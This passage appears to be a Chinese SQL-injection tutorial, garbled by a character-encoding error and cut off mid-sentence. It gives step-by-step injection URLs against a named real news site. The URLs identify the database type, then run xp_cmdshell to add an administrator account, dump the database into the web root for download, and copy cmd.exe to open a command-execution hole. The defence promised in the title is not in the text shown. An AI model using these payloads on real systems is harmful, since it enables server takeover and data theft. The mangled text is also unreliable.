SQL ×¢Èë¹¥»÷Ô­Àí¼°·À»¤

SQL ×¢Èë¹¥»÷Ô­Àí¼°·À»¤
ÔÚÈ·ÈÏ¿ÉÒÔ×¢ÈëµÄÇé¿öÏ£¬Ê¹ÓÃÏÂÃæµÄÓï¾ä£º
HTTP://www.163.com/news.asp?id=xx ;and (select count(*) from sysobjects)£¾0
HTTP://www.163.com/news.asp?id=xx ;and (select count(*) from msysobjects)£¾0
Èç¹ûÊý¾Ý¿âÊÇSQLServer£¬ÄÇôµÚÒ»¸öÍøÖ·µÄÒ³ÃæÓëÔ­Ò³ÃæHTTP://www.163.com/news.asp?id=xxÊÇ´óÖÂÏàͬµÄ£»¶øµÚ¶þ¸öÍøÖ·£¬ÓÉÓÚÕÒ²»µ½±ímsysobjects£¬»áÌáʾ³ö´í£¬¾ÍËã³ÌÐòÓÐÈÝ´í´¦Àí£¬Ò³ÃæÒ²ÓëÔ­Ò³ÃæÍêÈ«²»Í¬¡£
Èç¹ûÊý¾Ý¿âÓõÄÊÇAccess£¬ÄÇôÇé¿ö¾ÍÓÐËù²»Í¬£¬µÚÒ»¸öÍøÖ·µÄÒ³ÃæÓëÔ­Ò³ÃæÍêÈ«²»Í¬£»µÚ¶þ¸öÍøÖ·£¬ÔòÊÓºõÊý¾Ý¿âÉèÖÃÊÇ·ñÔÊÐí¶Á¸Ãϵͳ±í£¬Ò»°ãÀ´ËµÊDz»ÔÊÐíµÄ£¬ËùÒÔÓëÔ­ÍøÖ·Ò²ÊÇÍêÈ«²»Í¬¡£´ó¶àÊýÇé¿öÏ£¬ÓõÚÒ»¸öÍøÖ·¾Í¿ÉÒÔµÃ֪ϵͳËùÓõÄÊý¾Ý¿âÀàÐÍ£¬µÚ¶þ¸öÍøÖ·Ö»×÷Ϊ¿ªÆôIIS´íÎóÌáʾʱµÄÑéÖ¤¡£
Èý¡¢È·¶¨XP_CMDSHELL¿ÉÖ´ÐÐÇé¿ö
Èôµ±Ç°Á¬½ÓÊý¾ÝµÄÕʺžßÓÐSAȨÏÞ£¬ÇÒmaster.dbo.xp_cmdshellÀ©Õ¹´æ´¢¹ý³Ì(µ÷Óô˴洢¹ý³Ì¿ÉÒÔÖ±½ÓʹÓòÙ×÷ϵͳµÄshell)Äܹ»ÕýÈ·Ö´ÐУ¬ÔòÕû¸ö¼ÆËã»ú¿ÉÒÔͨ¹ýÒÔϼ¸ÖÖ·½·¨ÍêÈ«¿ØÖÆ£¬ÒÔºóµÄËùÓв½Ö趼¿ÉÒÔÊ¡
1¡¢HTTP://www.163.com/news.asp?id=xx and user£¾;0 news.aspÖ´ÐÐÒì³£µ«¿ÉÒԵõ½µ±Ç°Á¬½ÓÊý¾Ý¿âµÄÓû§Ãû(ÈôÏÔʾdboÔò´ú±íSA)¡£
2¡¢HTTP://www.163.com/news.asp?id=xx and db_name()£¾0 news.aspÖ´ÐÐÒì³£µ«¿ÉÒԵõ½µ±Ç°Á¬½ÓµÄÊý¾Ý¿âÃû¡£
3¡¢HTTP://www.163.com/news.asp?id=xx£»exec master..xp_cmdshell “net user aaa bbb /add”-- (masterÊÇSQL-SERVERµÄÖ÷Êý¾Ý¿â£»ÃûÖеķֺűíʾSQL-SERVERÖ´ÐÐÍê·ÖºÅÇ°µÄÓï¾äÃû£¬¼ÌÐøÖ´ÐÐÆäºóÃæµÄÓï¾ä£»“—”ºÅÊÇ×¢½â£¬±íʾÆäºóÃæµÄËùÓÐÄÚÈݽöΪעÊÍ£¬ÏµÍ³²¢²»Ö´ÐÐ)¿ÉÒÔÖ±½ÓÔö¼Ó²Ù×÷ϵͳÕÊ»§aaa,ÃÜÂëΪbbb¡£
4¡¢HTTP://www.163.com/news.asp?id=xx£»exec master..xp_cmdshell “net localgroup administrators aaa /add”-- °Ñ¸Õ¸ÕÔö¼ÓµÄÕÊ»§aaa¼Óµ½administrators×éÖС£
5¡¢HTTP://www.163.com/news.asp?id=xx£»backuup database Êý¾Ý¿âÃû to disk='c:\inetpub\wwwroot\save.db' Ôò°ÑµÃµ½µÄÊý¾ÝÄÚÈÝÈ«²¿±¸·Ýµ½WEBĿ¼Ï£¬ÔÙÓÃHTTP°Ñ´ËÎļþÏÂÔØ(µ±È»Ê×Ñ¡ÒªÖªµÀWEBÐéÄâĿ¼)¡£
6¡¢Í¨¹ý¸´ÖÆCMD´´½¨UNICODE©¶´
HTTP://www.163.com/news.asp?id=xx;exec master.dbo.xp_cmdshell “copy c:\winnt\system32\cmd.exe
c:\inetpub\scripts\cmd.exe” ±ãÖÆÔìÁËÒ»¸öUNICODE©¶´£¬Í¨¹ý´Ë